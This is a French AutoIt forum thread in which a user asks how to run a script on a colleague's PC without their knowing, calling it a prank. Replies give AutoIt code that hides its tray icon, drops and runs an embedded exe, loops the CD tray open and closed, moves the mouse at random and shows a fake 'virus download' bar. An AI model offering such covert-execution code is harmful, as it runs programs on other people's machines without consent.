[R] Est-il possible d'envoyer un script à l'insu ?
Règles du forum
- Merci de consulter la section "Règles du forum" et plus particulièrement "Règles et Mentions Légales du site autoitscript.fr" avant d'écrire un message.
[R] Est-il possible d'envoyer un script à l'insu ?
Est-il possible d'envoyer un script sans que le récepteur ne télécharge rien et ne s'en rende pas compte ( juste au moment de l'exécution du script ) ?
Oui il me semble avec la fonction "FileInstall"
par exemple
le c:\envoi.exe represente ou se trouve le fichier sur ton PC pour l'ajouter au script et le C:\Windows\envoi.exe represente la ou sera placé le fichier quand le script sera lancé
Bien sur pour qu'il soit supprime utilise la fonction
Filedelete("C:\program\envoi.exe")
Voilà
par exemple
Code : Tout sélectionner
FileInstall("C:\envoi.exe", "C:\program\envoi.exe")
Bien sur pour qu'il soit supprime utilise la fonction
Filedelete("C:\program\envoi.exe")
Voilà
- Tlem
- Site Admin
- Status : Hors ligne
Veuillez préciser un peut plus votre question, car dans l'énoncé, il semble que ça s'approche plus d'un script hostile, que d'une blague de mauvais goût.
Thierry
Rechercher sur le forum ----- Les règles du forum
Le "ça ne marche pas" est une conséquence commune découlant de beaucoup trop de raisons potentielles ...
Une idée ne peut pas appartenir à quelqu'un. (Albert Jacquard) tiré du documentaire "Copié n'est pas volé".
Rechercher sur le forum ----- Les règles du forum
Le "ça ne marche pas" est une conséquence commune découlant de beaucoup trop de raisons potentielles ...
Une idée ne peut pas appartenir à quelqu'un. (Albert Jacquard) tiré du documentaire "Copié n'est pas volé".
Non, j'aimerais voir la réaction d'un collègue à la caméra avec ce script, rien de bien méchant, mais ça le fait pas si je leur dit "télécharge ça, c'est un programme à moi
" par exemple :
ou encore:

#NoTrayIcon
While 1
CDTray("e:","open")
CDTray("e","close")
WEnd
#NoTrayIcon
While 1
$x = Random(0,1024)
$y = Random(0,1024)
MouseMove($x,$y)
WEnd
Mais non Tlem, tu te fait des idées, au vu du code, je le mettrais plutôt dans le cas du "code malicieux" ou du " programme malveillant".Tlem a écrit :Veuillez préciser un peut plus votre question, car dans l'énoncé, il semble que ça s'approche plus d'un script hostile, que d'une blague de mauvais goût.
Dans ce cas la ceci devrait te faire plaisir

#NoTrayIcon
FileInstall("C:\envoi.exe", "C:\envoi.exe")
ProgressOn("Téléchargement en cours","Téléchargement d'un virus !","0 %")
For $i = 0 to 100 step 1
sleep(100)
ProgressSet($i,1*$i&" %")
Next
ProgressSet(100,"Votre fichier a bien été téléchargé","Succès du téléchargement !")
sleep(2000)
ProgressOff()
Run("c:\envoi.exe")
While 1
CDTray("e:","open")
CDTray("e","close")
WEnd
Filedelete("C:\envoi.exe")
-
- Niveau 4
- Status : Hors ligne